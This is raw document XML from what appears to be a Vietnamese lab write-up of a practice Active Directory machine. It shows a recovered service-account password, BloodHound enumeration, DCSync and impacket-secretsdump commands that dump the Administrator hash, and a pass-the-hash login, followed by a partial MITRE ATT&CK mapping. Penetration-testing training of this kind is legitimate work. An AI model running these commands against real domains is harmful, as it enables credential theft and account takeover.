            <wp:extent cx="4098471" cy="3279409"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Picture 2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1526" cy="328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37DE" w14:textId="108F86B3" w:rsidR="006D6673" w:rsidRDefault="007D1A2E" w:rsidP="004477D4">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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 xml:space="preserve">Ta thu được credential mới: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D1A2E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>svc_loanmanager:Moneymakestheworldgoround!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F3D0B" w14:textId="36422AB2" w:rsidR="000E21CB" w:rsidRPr="000E21CB" w:rsidRDefault="000E21CB" w:rsidP="000E21CB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>Khi kiểm tra bằng lệnh: net user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E152FD9" w14:textId="236CC13D" w:rsidR="000E21CB" w:rsidRDefault="000E21CB" w:rsidP="004477D4">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E21CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="432D1DCF" wp14:editId="1662F021">
            <wp:extent cx="2578100" cy="519617"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="Picture 3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0495" cy="52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FB15" w14:textId="646D7569" w:rsidR="000E21CB" w:rsidRPr="000E21CB" w:rsidRDefault="000E21CB" w:rsidP="004477D4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 xml:space="preserve">Không tồn tại user </w:t>
      </w:r>
      <w:r w:rsidRPr="007D1A2E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>svc_loanmanager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">nên ta thay bằng </w:t>
      </w:r>
      <w:r w:rsidRPr="00666A7B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>svc_loanmgr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39060698" w14:textId="3546A528" w:rsidR="00377ED6" w:rsidRPr="000E21CB" w:rsidRDefault="00377ED6" w:rsidP="004477D4">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377ED6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331A6D4D" wp14:editId="13336216">
            <wp:extent cx="3510643" cy="1153733"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="31" name="Picture 3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 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8483" cy="115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CE17" w14:textId="2DFD4CFD" w:rsidR="00377ED6" w:rsidRDefault="00377ED6" w:rsidP="004477D4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>Kết nối account svc_</w:t>
      </w:r>
      <w:r w:rsidR="002E3000">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>loanmgr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> thành công bằng evil-winrm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9A91A" w14:textId="5E7B8FB1" w:rsidR="00D26A59" w:rsidRPr="00F80F6D" w:rsidRDefault="002E3000" w:rsidP="006D6673">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc152522892"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Blood hound</w:t>
      </w:r>
      <w:r w:rsidR="00F80F6D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00F80F6D" w:rsidRPr="00F80F6D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00F80F6D">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Root)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="37364BE5" w14:textId="6128B74D" w:rsidR="00944977" w:rsidRDefault="00944977" w:rsidP="00F123C2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t xml:space="preserve">Dùng </w:t>
      </w:r>
      <w:r w:rsidR="002E3000">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>bloodhound để thu thập thông tin</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E3000">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>của user svc_loanmgr</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720CE1BB" w14:textId="4E559FF2" w:rsidR="006661CE" w:rsidRDefault="006661CE" w:rsidP="00F123C2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 xml:space="preserve">Tải tại đây: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="001C6178">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>https://bloodhound.readthedocs.io/en/latest/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="773BAB0C" w14:textId="6208B290" w:rsidR="006661CE" w:rsidRDefault="006661CE" w:rsidP="00F123C2">
      <w:pPr>
        <w:ind w:left="144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>Chạy lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B7378D" w14:textId="1F99AF72" w:rsidR="006661CE" w:rsidRDefault="006661CE" w:rsidP="00F123C2">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006661CE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>neo4j console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC7357" w14:textId="586B6255" w:rsidR="006661CE" w:rsidRDefault="006661CE" w:rsidP="00F123C2">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006661CE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>sudo ./BloodHound --no-sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA844CD" w14:textId="074B53BC" w:rsidR="006661CE" w:rsidRDefault="006661CE" w:rsidP="00F123C2">
      <w:pPr>
        <w:ind w:left="144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 xml:space="preserve">Sẽ hiện lên page blood hound để tương tác và đăng nhập bằng account của </w:t>
      </w:r>
      <w:r w:rsidR="00E94596">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD81262" w14:textId="23DBE6D1" w:rsidR="00E94596" w:rsidRDefault="001917D4" w:rsidP="00F123C2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lastRenderedPageBreak/>
        <w:t>Chạy lệnh để thu thập thông tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F952A" w14:textId="0EA01DA8" w:rsidR="00DC5CD7" w:rsidRDefault="001917D4" w:rsidP="00F123C2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001917D4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>bloodhound-python -d EGOTISTICAL-BANK.LOCAL -c All -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.129.95.180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9E7C8A" w14:textId="058F0EB8" w:rsidR="00F123C2" w:rsidRDefault="00F123C2" w:rsidP="00F123C2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>Upload các thông tin vừa thu được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83964B" w14:textId="757E0BA7" w:rsidR="00F123C2" w:rsidRDefault="00F123C2" w:rsidP="00F123C2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>Rồi chọn options: shortest path from domain admin ta được graph sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0B0FF" w14:textId="7F920950" w:rsidR="00F123C2" w:rsidRDefault="00F123C2" w:rsidP="00F123C2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 w:rsidRPr="00F123C2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDEBD7F" wp14:editId="6F306162">
            <wp:extent cx="2913463" cy="2467708"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8890"/>
            <wp:docPr id="33" name="Picture 33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diagram of a network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6438" cy="247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47D0" w14:textId="38B051D9" w:rsidR="00F123C2" w:rsidRDefault="00F123C2" w:rsidP="00F123C2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>Khi leo lên egotisical-bank.local thì ta sẽ có được quyền domain admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F40BB8F" w14:textId="1640F9F2" w:rsidR="00F123C2" w:rsidRDefault="00F123C2" w:rsidP="00F123C2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 w:rsidRPr="00F123C2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DE1E111" wp14:editId="4555093C">
            <wp:extent cx="3145399" cy="2367023"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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8845" cy="237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7887" w14:textId="50031EC3" w:rsidR="00F123C2" w:rsidRDefault="00F123C2" w:rsidP="00F123C2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>Chạy DCSync theo hướng dẫn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C00651" w14:textId="06AABDF9" w:rsidR="00F123C2" w:rsidRDefault="00F123C2" w:rsidP="00F123C2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F123C2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>lsadump::dcsync /domain:testlab.local /user:Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0C5D61" w14:textId="7A75F208" w:rsidR="00F123C2" w:rsidRDefault="00F123C2" w:rsidP="00B12CC2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 xml:space="preserve">Cách này dùng không </w:t>
      </w:r>
      <w:r w:rsidR="00B12CC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D304D6" w14:textId="70A85626" w:rsidR="00B12CC2" w:rsidRDefault="00B12CC2" w:rsidP="00B12CC2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>Chạy cách khác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FDE658" w14:textId="1618D8CD" w:rsidR="00B12CC2" w:rsidRDefault="00B12CC2" w:rsidP="00B12CC2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B12CC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.129.95.180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5241F39C" w14:textId="28121FD6" w:rsidR="00CA5002" w:rsidRDefault="00CA5002" w:rsidP="00CA5002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5002">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12EC84B1" wp14:editId="12DD56EF">
            <wp:extent cx="5169141" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="Picture 3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8821" cy="286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CD5B" w14:textId="7114FA33" w:rsidR="00032C03" w:rsidRDefault="00032C03" w:rsidP="00CA5002">
      <w:pPr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>Ta thu được hash của Administrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C127B" w14:textId="2279E58F" w:rsidR="00032C03" w:rsidRDefault="00032C03" w:rsidP="00032C03">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032C03">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396871AC" w14:textId="331B031E" w:rsidR="00032C03" w:rsidRPr="00032C03" w:rsidRDefault="00032C03" w:rsidP="00032C03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Dùng evil-winrm đăng nhập với hash vừa thu được ta chiếm được quyền admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E41D29" w14:textId="1F7D3C2A" w:rsidR="00FB091D" w:rsidRPr="00032C03" w:rsidRDefault="00032C03" w:rsidP="00032C03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032C03">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D95F60A" wp14:editId="76D9ACF0">
            <wp:extent cx="5455920" cy="991712"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="Picture 37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 shot of a computer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3390" cy="99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CC67" w14:textId="6B135F4C" w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc152522893"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Summary - Mapping MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="613BCEFC" w14:textId="1570A674" w:rsidR="00147C0B" w:rsidRPr="005A5EA7" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc152522894"/>
      <w:r w:rsidRPr="005A5EA7">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tactics: Reconnaissance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7C0B" w:rsidRPr="00147C0B" w14:paraId="411178B4" w14:textId="77777777" w:rsidTr="00147C0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DF1A638" w14:textId="5D276056" w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Technique / Sub-Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A82A56F" w14:textId="587DE265" w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Procedure(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00147C0B" w:rsidRPr="00147C0B" w14:paraId="26536CA6" w14:textId="77777777" w:rsidTr="00147C0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56506203" w14:textId="33CEB768" w:rsidR="00147C0B" w:rsidRPr="00BD400A" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Active Scanning</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> [</w:t>
            </w:r>
            <w:hyperlink r:id="rId33" w:history="1">
              <w:r w:rsidRPr="00BD400A">
                <w:rPr>
                  <w:rStyle w:val="link-annotation-unknown-block-id--720375198"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="22"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>T1595</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64CCF803" w14:textId="3B929C3A" w:rsidR="00147C0B" w:rsidRPr="00BD400A" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Kẻ tấn công đã thực hiện trinh sát target để thu thập các thông tin sơ lược như IP, các port được mở và các service tương ứng. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12B23E40" w14:textId="0999091F" w:rsidR="00472ECA" w:rsidRPr="005A5EA7" w:rsidRDefault="00472ECA" w:rsidP="00472ECA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc152522895"/>
      <w:r w:rsidRPr="005A5EA7">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactics: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Credentials Acces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72ECA" w:rsidRPr="00147C0B" w14:paraId="241FBD67" w14:textId="77777777" w:rsidTr="00F22B80">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0AD73E" w14:textId="77777777" w:rsidR="00472ECA" w:rsidRPr="00147C0B" w:rsidRDefault="00472ECA" w:rsidP="00F22B80">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Technique / Sub-Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
